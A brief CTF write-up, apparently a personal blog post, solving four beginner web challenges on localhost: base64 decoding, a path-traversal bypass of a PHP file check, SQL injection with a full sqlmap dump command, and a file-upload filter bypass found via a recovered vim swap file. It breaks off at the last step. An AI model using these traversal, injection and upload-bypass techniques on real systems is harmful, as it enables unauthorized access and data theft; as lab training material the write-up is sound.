CTF

Author Avatar
Junyangz 11月 20, 2017

签。。签到题?

你想要什么?告诉我

http://127.0.0.1:30004

  1. input ‘flag’
  2. get ZmxhZ3tXZWxDMG1lX3RvX2N0ZjJ9
  3. base64.decode(ZmxhZ3tXZWxDMG1lX3RvX2N0ZjJ9)
  4. get “flag{WelC0me_to_ctf2}”

文。。文件包含?

嘻嘻,我是flag,来包我啊~~

http://127.0.0.1:30005/page.php

  1. Index page
    This index page
    another page

  2. This is another page
    This is another page
    But nothing
    return index page

  3. observe url get file bypass

    • inspect source code
    • find

      john@ubuntu:/var/www$ tree
      .
      ├── flag
      └── html
        ├──page.php
        ├──index
        ├──another
      <!--
      if (strpos($file_path, ".") === 0 || substr_count($file_path, "..") > 2) {
        echo "<p>malicious parameter</>
      }
      
    • constract file bypass
      http://127.0.0.1:30005/page.php?file=/html/../flag

  4. get flag

    flag{Bypass_File_Path_Check}

S。。SQL注入?

听说flag表的value字段里面有好东西。。

http://127.0.0.1:30006/?id=MQ==

  1. base64.decode(MQ== ) = 1

  2. use sqlmap

     sqlmap.py -u"http://127.0.0.1:30006/?id=NA=="  --tamper base64encode.py -b --current-user --current-db  --tables  --columns --dump-all
    
  3. common method

  4. get flag

    flag{Have_Fun_In_SQL_Injection}

Upload and get flag

听说编辑文件的时候突然断电会产生swp文件呢~

http://127.0.0.1:30007/

http://127.0.0.1:30007/index.php
http://127.0.0.1:30007/.index.php.swp

curl -o .index.php.swp http://127.0.0.1:30007/.index.php.swp
vim -r .index.php.swp
if ($_FILES){
    if ($_FILES["file"]["error"] > 0)
    {
        echo "Error: " . $_FILES["file"]["error"] . "<br />";
    }
    else
    {
        if ($_FILES["file"]["type"] !== "image/jpeg"){
            die("stop hacking!");
        }
        if ($_FILES["file"]["size"] / 1024 > 2048){
            die("size too big!");
        }
        $file_tmp = fopen($_FILES["file"]["tmp_name"], 'rb');
        $bin = fread($file_tmp, 2);
        fclose($file_tmp);
        $data = unpack('C2chars', $bin);
        $type_code = intval($data['chars1'].$data['chars2']);
        $flag = 0;
        switch ($type_code) {
            case 255216:
                $fileType = 'jpg';
                $flag = 1;
                break;
            case 13780:
                $fileType = 'png';
                $flag = 1;
                break;
            default:
                $fileType = 'unknown';
                die("error file head!");
                break;
        }
        if ($flag === 1){
            $filetype = substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.'));
            $filename = md5($_FILES["file"]["name"]) . $filetype;
            if (strtolower($filetype) === ".php"){
                copy('../flag', $filename);
            }else{
                move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            }
            echo "<h1>成功</h1>";
        }
    }

All Summary

  1. upload php file

    • use burp suite modify filename Junyangz.jpg to Junyangz.php
  2. get file location

    • analyse index.php by .index.php.swp
    • get the file name :

      $filename = md5($_FILES[“file”][“name”]) . $filetype;

    • MD5.hash(Junyangz.php)=f0480f39a6cb1a1ff5f55021ac0824f7
    • as f0480f39a6cb1a1ff5f55021ac0824f7.php
  3. get flag: